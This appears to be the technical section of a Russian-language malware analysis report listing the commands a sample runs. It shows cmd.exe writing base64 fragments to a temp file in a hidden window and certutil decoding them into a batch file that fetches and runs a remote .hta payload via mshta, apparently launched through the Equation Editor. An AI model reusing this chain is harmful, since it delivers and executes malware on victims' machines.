Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:bXNodGEgaHR0cDovLzEwLj>%tmp%\B& C
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:gxLjEyOS40MS9ycHQvMTgx>>%tmp%\B&C
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:NDFiM2NlOGI2Yjk3ZS9SVE>>%tmp%\B&C
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:ZMMVpTMHljZWlqY3dXTHBD>>%tmp%\B&C
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:eUVHWnFRYWEvby5odGE=>>%tmp%\B& C
- '%WINDIR%\syswow64\cmd.exe' /c certutil -decode %tmp%\B %tmp%\y.bat&C
- %TEMP%\b
- %TEMP%\y.bat
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:bXNodGEgaHR0cDovLzEwLj>%tmp%\B& C' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:gxLjEyOS40MS9ycHQvMTgx>>%tmp%\B&C' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:NDFiM2NlOGI2Yjk3ZS9SVE>>%tmp%\B&C' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:ZMMVpTMHljZWlqY3dXTHBD>>%tmp%\B&C' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ECHO:eUVHWnFRYWEvby5odGE=>>%tmp%\B& C' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c certutil -decode %tmp%\B %tmp%\y.bat&C' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\certutil.exe' -decode %TEMP%\B %TEMP%\y.bat